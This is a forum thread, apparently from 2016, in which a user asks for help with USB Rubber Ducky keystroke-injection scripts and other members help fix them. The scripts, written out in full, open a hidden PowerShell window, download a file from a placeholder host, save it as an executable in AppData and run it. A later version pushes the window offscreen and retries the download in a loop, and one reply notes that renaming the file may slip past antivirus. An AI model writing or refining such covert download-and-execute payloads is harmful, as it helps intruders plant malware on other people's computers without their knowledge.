Jump to content

Rubber Ducky Use = Flash/Focus/License/Creation/Driver


Recommended Posts

Hello
On my W7 Ultimate laptop I plan to use the RD like a classic HID. I keep the original SD card and the original duck firmware (duck.hex). I don't need that RD is recognized like a drive and I'll use this script = https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute . Here is my question for my actual situation :
1) Is it necessary to flash my SD card (for fat32 or something else) ?
2) I would like to use this script below. Is there a way to keep the focus on the hidden powershell windows opened/keep it on the first plan (to let the time to write the code lines) ? :
DELAY 10000
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;
ENTER
DELAY 5000
STRING start-process file.exe
ENTER
DELAY 100
STRING exit
ENTER
3) I saw the RD license (for the driver) is a classic one, a better one will increase the price of RD I readed. So do you know where I could buy this kind of "better license" ? I would like this especially to not
have problems of compatibility and get a very fast driver installation for the first RD connection.
4) For a laptop (W7 Ultimate) is it better to use GUI R, WINDOWS R, CONTROL ESCAPE ?
5) To make my script, is it better to use ? :
/ Duck Toolkit 2 = http://www.ducktoolkit.com
6) The driver installation for the first RD connection will ask something like 10 seconds, 30 seconds or more ?
7) For the powershell command is it better to use only .exe extension or .old/.apk ? What are the advantages ? The conversion old/apk => exe works everytime ?
8) The laptop where I'll plug the RD need Java installed or not ?
Thanks in advance.
SW
Link to comment
Share on other sites

1. Don't change the format of the SD card. It should come standard as FAT32 (I believe) so leave it as that. 

2. There's no way to force powershell to stay active, as you've set the windowstyle to hidden. 

3. No idea about any special drivers. 

4. Stay with GUI r as you are already using. 

5. I use the encoder from the rubber ducky github. 

6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s. 

7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that. 

8. No, it won't need Java when it is running as a keyboard. 

Link to comment
Share on other sites

Thanks for your answers.

6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s.

Ok. And the RD script starts after this first installation time I guess yes ? I don't need to set 15 sec delay so ?

7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that.

Ok. It just rename the file so my code above is correct ? STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;

I'm just scary now to keep the focus on the hidden powershell windows opened/keep it on the first plan.. I guess there is no solution.

Link to comment
Share on other sites

On 5/18/2016 at 8:49 PM, Source_Writer said:

Thanks for your answers.


6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s.

Ok. And the RD script starts after this first installation time I guess yes ? I don't need to set 15 sec delay so ?.

No. The ducky starts to run as soon as it's plugged in, the only problem is that the computer won't respond to the keystrokes until after the driver has loaded. You will need a delay otherwise it'll start part way through.

 

On 5/18/2016 at 8:49 PM, Source_Writer said:

 


7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that.

Ok. It just rename the file so my code above is correct ? STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;

I'm just scary now to keep the focus on the hidden powershell windows opened/keep it on the first plan.. I guess there is no solution.

I'm not sure that the destination will function correctly. Variables in powershell are like $this and I don't think the web request will download the file to the correct location. You'll have to use $env:appdata instead.

Link to comment
Share on other sites

Well since all questions hav e been answered so far, I'll just want to add my experiences to some of them

Question #5:
I usually use the GUI version of DuckyEncoder. But the other options are good aswell.

Question #6:
An initial DELAY 3000 should be sufficient for more or less modern systems - even for one of my old 800MHz Laptop (XP SP3).

 

Link to comment
Share on other sites

  • 4 weeks later...

I readed some article and arrived to that result (I didn't test it yet) :

DELAY 20000
GUI r
DELAY 300
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
STRING powershell -windowstyle hidden do{sleep 5;(New-Object Net.WebClient).DownloadFile('http://site.com/file.old','%APPDATA%\file.exe')}while(!$?);&'%APPDATA%\7z1601.exe'
ENTER

What do you think about that final code ?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...